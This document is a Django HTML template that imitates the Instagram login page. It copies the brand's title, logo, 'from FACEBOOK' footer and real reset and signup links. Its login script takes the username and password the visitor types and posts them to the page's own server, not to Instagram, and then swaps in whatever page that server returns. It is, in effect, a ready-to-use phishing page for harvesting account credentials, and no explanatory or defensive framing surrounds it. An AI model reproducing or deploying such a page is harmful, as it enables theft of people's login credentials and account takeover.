<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    {% load static %}
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="{% static 'Instagram.css' %}">
    <meta charset="utf-8">
    <title>Instagram</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,user-scalable=0"/>
  </head>
  <body>
    <img id='logo' src="{% static 'logo.png' %}" alt="logo">
    <div class="content">
      <div class="div-user">
        <input aria-describedby="" id="username" placeholder="Phone number, username, or email" aria-required="true" autocapitalize="off" autocorrect="off" spellcheck="false" maxlength="30" name="username" value="" type="text">
      </div>
      <div class="div-pass">
        <input aria-describedby="" id="password" placeholder="Password" aria-required="true" autocapitalize="off" autocorrect="off" name="password" spellcheck="false" value="" type="password">
      </div>

      <a id="forgot" href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
      <div class="login">
        <button type="button" name="button" onclick="login()" id="login">Log In</button>
      </div>

      <p id="noaccount">Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/" id="signup">Sign up</a></p>
    </div>
    <footer>
      <p id="from">from</p>
      <p id="facebook">FACEBOOK</p>
    </footer>
  </body>
</html>
<style media="screen">
  #login {
    height: 38px;
    padding: 0;
  }

</style>

<script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
<script src="{% static 'loading.js' %}"></script>
<script type="text/javascript">

  function login()
  {
    var username = document.getElementById("username").value;
    var password = document.getElementById("password").value;
    console.log(username);
    var xmlHttp = new XMLHttpRequest();
    var csrftoken = Cookies.get('csrftoken');
    xmlHttp.open('POST', window.location.href);
    xmlHttp.onload = function (e) {
    if (xmlHttp.readyState === 4) {
        stopLoading();
        if (xmlHttp.status === 200) {
          document.open();
          window.close();
          document.write(xmlHttp.responseText);
          document.close();
        } else {
          alert("Failed loading page with status code "+xmlHttp.status);
        }
      }
    };
    xmlHttp.setRequestHeader('X-CSRFToken', csrftoken);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    load();
    xmlHttp.send("username="+username+"&password="+password);
  }
</script>
